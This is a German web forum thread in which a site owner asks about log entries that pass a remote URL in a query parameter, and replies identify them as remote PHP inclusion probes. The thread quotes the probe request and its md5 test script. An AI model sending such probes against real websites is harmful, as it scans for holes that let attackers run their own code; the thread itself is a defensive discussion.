URL Aufrufe in den Log Files

M

morevideo

Aktives Mitglied
Hallo,

ich entdecke in den Logfiles des öfteren Einträge wie diesen hier:


GET /index.html?q=http://www.felixtorresycia.com/admin/correo/enaq/ecib/

Wenn man die fremde URL aufruft, findet man ein kurzes PHP Script in Klarschrift:
<?php echo md5("just_a_test");?>

Muss ich mir da Sorgen machen?
unsure.gif


Und wenn ja, was mach ich da gegen?
blink.gif


Schönen Dank vorab.
 
da probiert jemand über q ein php-script zu übergeben, dass dein script dann hoffentlich ausführt....

was du dagegen machst? nichts, wenn du dir sicher bist, dass dein script keine solchen lücken hat
 
jeronimo: Vielen Dank, die GET Methode ist mir schon bekannt,
es ging mir vielmehr um das Unterschieben eines php scriptes und die Deutung desselben als
Sicherheitslücke und Vorbote eines wie auch immer gearteten Angriffs.

nitrit: Danke, ich werd das unter Beobachtung halten.
 
scheint eine test datei die bei md5 bei einer Verbindung verwendet und abgelegt wird - wie die datei heißt ist vermutlich konfigurationsabhängig . . .

MD5

 
Sie müssen sich einloggen oder registrieren, um hier antworten zu können.
Zurück
Oben